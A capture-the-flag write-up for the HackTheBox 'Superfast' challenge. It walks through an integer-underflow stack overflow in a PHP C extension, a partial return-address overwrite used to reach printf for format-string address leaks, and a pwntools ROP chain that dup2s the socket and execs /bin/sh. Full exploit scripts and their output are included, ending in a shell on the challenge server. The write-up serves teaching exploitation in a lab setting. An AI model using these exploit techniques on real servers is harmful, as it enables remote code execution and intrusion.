Superfast (HackTheBox)

Hey folks. In this write-up, we're going to discuss the Superfast challenge in HackTheBox which was part of the HackTheBox Business CTF 2022. We're going to perform a single-byte overwrite to bypass ASLR, leak stack pointers, and perform a Return Oriented Programming (ROP) chain. The description of the challenge is:

We've tracked connections made from an infected workstation back to this server. We believe it is running a C2 checkin interface, the source code of which we aquired from a temporarily exposed Git repository several months ago.Apparently the engineers behind it are obsessed with speed, extending their programs with low-level code. We think in their search for speed they might have cut some corners - can you find a way in?

I really enjoyed pwning this challenge since it has a unique and quite realistic target which I haven't seen before in CTFs.

Index

  • First looks
  • Finding primitives
  • Developing the ROP chain
  • Retrieving the flag

First looks

We're given a PHP file with a shared object (.so) written in C, and we're given a source directory for the shared object.

.
├── build_docker.sh
├── challenge
│   ├── index.php
│   ├── php_logger.so
│   └── start.sh
├── Dockerfile
└── src
    ├── build.sh
    ├── config.m4
    ├── php_logger.c
    └── php_logger.h

2 directories, 9 files

Directories given with the challenge

In /challenge/start.sh we can see that the challenge code gets bootstrapped using:

#!/bin/sh
while true; do php -dextension=/php_logger.so -S 0.0.0.0:1337; done

The content of start.sh

We can see that PHP loads php_logger.so as a binary extension for the webserver.

Finding primitives

To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork.

Analysing index.php

The content of index.php (below) checks for a header called Cmd-Key and a parameter cmd.

<?php
if (isset($_SERVER['HTTP_CMD_KEY']) && isset($_GET['cmd'])) {
	$key = intval($_SERVER['HTTP_CMD_KEY']);
	if ($key <= 0 || $key > 255) {
		http_response_code(400);
	} else {
		log_cmd($_GET['cmd'], $key);
	}
} else {
	http_response_code(400);
}

Content of index.php

One of the most important stages of exploit development is making a reproducing environment. Considering I want to run GDB on php_logger.so, I will run the challenge without Docker. I can run the PHP index.php with php -dextension=./php_logger.so -S 0.0.0.0:1337 in /challenge/ and I can send the HTTP request using curl 'http://127.0.0.1:1337/index.php?cmd=123' -H 'Cmd-Key: 123. We can see it succeeds because it returns a 200 status code.

[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 Accepted
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 [200]: GET /?cmd=123
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 Closing

Verbose output of the PHP webserver

Regarding functionality, we can see that index.php calls log_cmd($cmd, $key) with 0 < $key < 256.

Analyzing php_logger.so

We can find the source code of php_logger.so in /src/php_logger.c. Under which, we can find the source code of log_cmd() as well. We can see that log_cmd() retrieves function arguments using zend_parse_parameters(). Then, it calls decrypt($cmd, $cmdlen, $key) and - if the return is valid - appends to the /tmp/log file.

PHP_FUNCTION(log_cmd) {
    char* input;
    zend_string* res;
    size_t size;
    long key;
    if (zend_parse_parameters(ZEND_NUM_ARGS(), "sl", &input, &size, &key) == FAILURE) {
        RETURN_NULL();
    }
    res = decrypt(input, size, (uint8_t)key);
    if (!res) {
        print_message("Invalid input provided\n");
    } else {
        FILE* f = fopen("/tmp/log", "a");
        fwrite(ZSTR_VAL(res), ZSTR_LEN(res), 1, f);
        fclose(f);
    }
    RETURN_NULL();
}

Source code of log_cmd()

This function does look safe, so the vulnerability is in decrypt(input, size, key). This function checks if the size of the command is less than the size of the stack buffer. If it is more it will return, but if it is less it will memcpy() and XOR the buffer with the key.

zend_string* decrypt(char* buf, size_t size, uint8_t key) {
    char buffer[64] = {0};
    if (sizeof(buffer) - size > 0) {
        memcpy(buffer, buf, size);
    } else {
        return NULL;
    }
    for (int i = 0; i < sizeof(buffer) - 1; i++) {
        buffer[i] ^= key;
    }
    return zend_string_init(buffer, strlen(buffer), 0);
}

Source code of decrypt()

We can see that sizeof(buffer) - size > 0 is used for the size check. However, sizeof() returns size_t, which is an unsigned integer on 32-bit and (in this case) an unsigned long on 64-bit. Since we are essentially doing ulong - int > int, we are using an unsigned value as a base value which means the value will wrap around. For example, in this case (uint)0 - (int)1 would become 2**32-1, instead of -1. A practical example would be the one below. The output of the program is 4294967295 1.

int main()
{
    unsigned int a = 5;
    int b = 6;

    printf("%u %d", a - b, a - b > 0);
}

Demo of interaction between (unsigned) integers

That means that sizeof(buffer) - size > 0) is always true, unless sizeof(buffer) == size. The result of that is a buffer overflow on the stack which we can leverage for a control flow hijacking primitive. Using Ghidra - the reverse engineering suite developed by the NSA - we can see that the offset from the buffer to the return address on the stack is 0x98 (152) bytes.

Stack variable offsets in Ghidra

However, ASLR is enabled. That means that we cannot guess the library's memory address and hence cannot guess a return address for control flow hijacking. However, the smallest 12 bits of an address are not random, and thus can we reliably overwrite 12 bits of the return address. Say our normal return address would be 0x555555559a1e, in the next program, it could be 0x55555123fa1e, but the 0xa1e at the end doesn't change, because it's the smallest 12 bits.

The reason only the first 12 bits of the address don't change, is because they point to 4096 bytes (2 ** 12 bits), which is the page size. The kernel - the manager of ASLR - can't work with addresses smaller than 4096 bytes.

Sadly, we can only write bundles of 8 bits (1 byte) at a time considering we're working with a char data type. This means we could only overwrite the 0x1e part of the addresses listed above, which narrows our possible return address area.

In Ghidra, we can figure out that the return address from decrypt() to log_cmd() (without ASLR) is equal 0x1014129. This means our scope of possible return addresses ranges from 0x1014100 to 0x10141ff.

      0010141e 48 89 ce     MOV       param_2,RCX
      00101421 48 89 c7     MOV       param_1,RAX
      00101424 e8 07 fc     CALL      decrypt
               ff ff
      00101429 48 89 44     MOV       qword ptr [RSP + local_10],RAX
               24 38
      0010142e 48 83 7c     CMP       qword ptr [RSP + local_10],0x0
               24 38 00

The code in our return scope is the following. We can see that decrypt() is called, print_message() is called and a bunch of file IO functions. Internally, print_message() is a wrapper for php_printf(): the printf() function in PHP. This is interesting because it outputs to the HTTP response body, which means that we can leak pointers.

    *(undefined4 *)(param_2 + 8) = 1;
  }
  else {
    iVar1 = decrypt(local_20,local_28,(size_t *)(local_30 & 0xff),local_28,(size_t)inlen);
    local_10 = CONCAT44(extraout_var,iVar1);
    if (local_10 == 0) {
      print_message("Invalid input provided\n");
    }
    else {
      local_18 = fopen("/tmp/log","a");
      fwrite((void *)(local_10 + 0x18),*(size_t *)(local_10 + 0x10),1,local_18);
      fclose(local_18);
    }
    *(undefined4 *)(param_2 + 8) = 1;
  }
  return;
}

C decompilation of our return scope 

However, in order to leak pointers with print_message(), we need to set the RDI register to the printf format string. Fortunately, the RDI register is set to the input argument of decrypt(char* buf, size_t size, uint8_t key) at 0x101390.

      00101385 48 8b 84     MOV       RAX,qword ptr [RSP + local_18]
               24 a0 00 
               00 00
      0010138d 48 89 c6     MOV       inputlen,RAX
      00101390 48 89 cf     MOV       input,param_4
      00101393 e8 e8 fc     CALL      <EXTERNAL>::memcpy
               ff ff
      00101398 48 8b 54     MOV       key,qword ptr [RSP + local_58]
               24 60

Assembly code which moves the input into the RDI register

When I try to fuzz using a script, I receive the following output:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@\x81\xd5\x84U\x80~

Fuzzing output

from pwn import xor
import requests

xorkey = 1

s = requests.session()
headers = {"cmd-key": str(xorkey)}

# offset = 152 
payload = b"A"*152 + b"\x40"
content = s.get(b"http://127.0.0.1:1337?cmd="+payload, headers=headers).content
print(xor(content, xorkey))

Script used to fuzz

However, when we remove the xor() function call, we can see that the end of the response is an address like b'A\x80\xd4\x85T\x81\x7f'. Using print(hex(u64(content[63:].ljust(8, b'\x00')))) we can translate it to 0x7f815485d48041. In order to identify where this leak happens, we can start a GDB server. We leak the address 0x7f651305f54041 and in GDB we can see with vmmap (in pwndbg) that this falls under 0x7f6513000000 0x7f6513200000 rw-p 200000 0 [anon_7f6513000]. Since this isn't executable it's irrelevant for the ROP chain.

from pwn import xor, gdb, u64
import requests
import time

gdb.debug(args=['php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
time.sleep(5)

xorkey = 1

s = requests.session()
headers = {"cmd-key": str(xorkey)}

payload = b"A"*152 + b"\x40"
content = s.get(b"http://127.0.0.1:1337?cmd="+payload, headers=headers).content
print(hex(u64(content[63:].ljust(8, b'\x00'))))

time.sleep(999)

Script for debugging using GDB

Since that is useless, we need to find another way to leak addresses. To do that, we can utilize the fact that we're calling printf(). By supplying a payload like %08x %08x %08x %08x we can leak the stack. By trial and error, I found out that we can leak the stack, php_logger.so and the PHP binary using the format string %llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_. Using the following payload, we can see the following leaks:

php @ 0x55c720a64000
php_logger.so @ 0x7f609866e000
stack @ 0x7fff10fbd480

Output of the script

#!/usr/bin/env python3

from pwn import xor, u64, gdb
import requests
import time

gdb.debug(args=['php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')

time.sleep(3)

xorkey = 0x4
s = requests.session()
headers = {"cmd-key": str(xorkey)}

fmt = b'%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_'
payload = xor(fmt + b"A"*(152 - len(fmt)), xorkey) + b"\x40"
url = b"http://127.1:1337/index.php?cmd=" + payload
print(url)

content = s.get(url, headers=headers).content
addresses = content.split(b"_")

php_base = int(addresses[5], 16)-0x55e240
logger_base = int(addresses[8], 16)-0x1445
stack = int(addresses[0], 16)

print("php @", hex(php_base))
print("php_logger.so @", hex(logger_base))
print("stack @", hex(stack))

time.sleep(999)

Payload for leaking addresses

We have the needed primitives, so we can develop the ROP chain.

Developing the ROP chain

Now we can use pwntools' ELF classes in order to make automatic ROP-chains. Using pwntools' ELF class we can see that the execl function in the PLT section of the php binary. This means we can use it to spawn a shell. Our strategy is:

  1. Leaking the address of the PHP binary and the php_logger.so in memory.
  2. dup2(4, N) to set stdin, stdout and stderr file descriptors to the TCP connection file descriptor for the webserver.
  3. execl("/bin/sh", "/bin/sh", 0) to spawn the /bin/sh executable

We can generate a ROP chain automatically with pwntools:

rop = ROP(php)

'''
fd[0]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[1]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[2]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[3]      tcp 0.0.0.0:1337 => 0.0.0.0:0 (listen)
fd[4]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
'''

# set connection socket to stdin/stdout/stderr
rop.call('dup2', [4, 0])
rop.call('dup2', [4, 1])
rop.call('dup2', [4, 2])

binsh = next(php.search(b"/bin/sh\x00"))

rop.call('execl', [binsh, binsh, 0])
print(rop.dump())

Python code for generating the ROP chain

Which gives the following ROP chain:

0x0000:   0x56244b60816b pop rdi; ret
0x0008:              0x4 [arg0] rdi = 4
0x0010:   0x56244b6043fc pop rsi; ret
0x0018:              0x0 [arg1] rsi = 0
0x0020:   0x56244b601be0 dup2
0x0028:   0x56244b60816b pop rdi; ret
0x0030:              0x4 [arg0] rdi = 4
0x0038:   0x56244b6043fc pop rsi; ret
0x0040:              0x1 [arg1] rsi = 1
0x0048:   0x56244b601be0 dup2
0x0050:   0x56244b60816b pop rdi; ret
0x0058:              0x4 [arg0] rdi = 4
0x0060:   0x56244b6043fc pop rsi; ret
0x0068:              0x2 [arg1] rsi = 2
0x0070:   0x56244b601be0 dup2
0x0078:   0x56244b60816b pop rdi; ret
0x0080:   0x56244bd03fc3 [arg0] rdi = 94713890750403
0x0088:   0x56244b60487c pop rdx; ret
0x0090:              0x0 [arg2] rdx = 0
0x0098:   0x56244b6043fc pop rsi; ret
0x00a0:   0x56244bd03fc3 [arg1] rsi = 94713890750403
0x00a8:   0x56244b6042d0 execl

ROP chain generated by pwntools

As we can see, it does the following:

dup(4, 0)
dup(4, 1)
dup(4, 2)
execl("/bin/sh", "/bin/sh", 0)

C representation of the ROP chain

Retrieving the flag

I coded the following script to utilize the ROP chain. If we run this, we get a shell on the box.

#!/usr/bin/env python3

from pwn import xor, u64, gdb, ELF, p64, remote, ROP, context
import requests
import time
import urllib

#gdb.debug(args=['/usr/bin/php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
#time.sleep(5)

target_ip = b"161.35.173.232"
target_port = b"31302"

target_host = b"http://" + target_ip + b":" + target_port

s = requests.session()
headers = {"cmd-key": "1"}

fmt = b'%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_'
payload = xor(fmt + b"A"*(152 - len(fmt)), 1) + b"\x40"

print("[*] sending payload...")
content = s.get(target_host + b"/index.php?cmd=" + payload, headers=headers).content
addresses = content.split(b"_")

print("[*] loading addresses...")
# set context for ROP()
#context.binary = php = ELF('/usr/bin/php', checksec=False)
context.binary = php = ELF('./php', checksec=False)
php.address = int(addresses[5], 16) - php.sym.executor_globals

php_logger = ELF('pwn_superfast/challenge/php_logger.so', checksec=False)
php_logger.address = int(addresses[8], 16)-0x1445
stack = int(addresses[0], 16)

print("[+] php @", hex(php.address))
print("[+] php_logger.so @", hex(php_logger.address))
print("[+] stack @", hex(stack))

rop = ROP(php)

'''
fd[0]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[1]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[2]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[3]      tcp 0.0.0.0:1337 => 0.0.0.0:0 (listen)
fd[4]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
'''

# set connection socket to stdin/stdout/stderr
rop.call('dup2', [4, 0])
rop.call('dup2', [4, 1])
rop.call('dup2', [4, 2])

binsh = next(php.search(b"/bin/sh\x00"))

rop.call('execl', [binsh, binsh, 0])
print(rop.dump())

payload = b'A'*152 + rop.chain()
http = "GET /index.php?cmd=" + urllib.parse.quote(payload) + " HTTP/1.1\n"
http += "Cmd-Key: 1\n\n"

print("[*] sending payload for shell...")
p = remote(target_ip, int(target_port))
p.send(http.encode())
p.interactive()

time.sleep(999)

Python script for retrieving the flag

$ python3 script.py
[*] sending payload...
[*] loading addresses...
[+] php @ 0x55da3ce00000
[+] php_logger.so @ 0x7fb906c50000
[+] stack @ 0x7ffee56eddc0
[*] Loaded 327 cached gadgets for './php'
0x0000:   0x55da3d00816b pop rdi; ret
0x0008:              0x4 [arg0] rdi = 4
0x0010:   0x55da3d0043fc pop rsi; ret
0x0018:              0x0 [arg1] rsi = 0
0x0020:   0x55da3d001be0 dup2
0x0028:   0x55da3d00816b pop rdi; ret
0x0030:              0x4 [arg0] rdi = 4
0x0038:   0x55da3d0043fc pop rsi; ret
0x0040:              0x1 [arg1] rsi = 1
0x0048:   0x55da3d001be0 dup2
0x0050:   0x55da3d00816b pop rdi; ret
0x0058:              0x4 [arg0] rdi = 4
0x0060:   0x55da3d0043fc pop rsi; ret
0x0068:              0x2 [arg1] rsi = 2
0x0070:   0x55da3d001be0 dup2
0x0078:   0x55da3d00816b pop rdi; ret
0x0080:   0x55da3d703fc3 [arg0] rdi = 94395821998019
0x0088:   0x55da3d00487c pop rdx; ret
0x0090:              0x0 [arg2] rdx = 0
0x0098:   0x55da3d0043fc pop rsi; ret
0x00a0:   0x55da3d703fc3 [arg1] rsi = 94395821998019
0x00a8:   0x55da3d0042d0 execl
[*] sending payload for shell...
[+] Opening connection to b'161.35.173.232' on port 31302: Done
[*] Switching to interactive mode
sh: turning off NDELAY mode
$ whoami
ctf

Output of the exploit

Thanks for reading my write-up about the HackTheBox Business CTF 2022 Superfast challenge; I hope you learned as much as I did.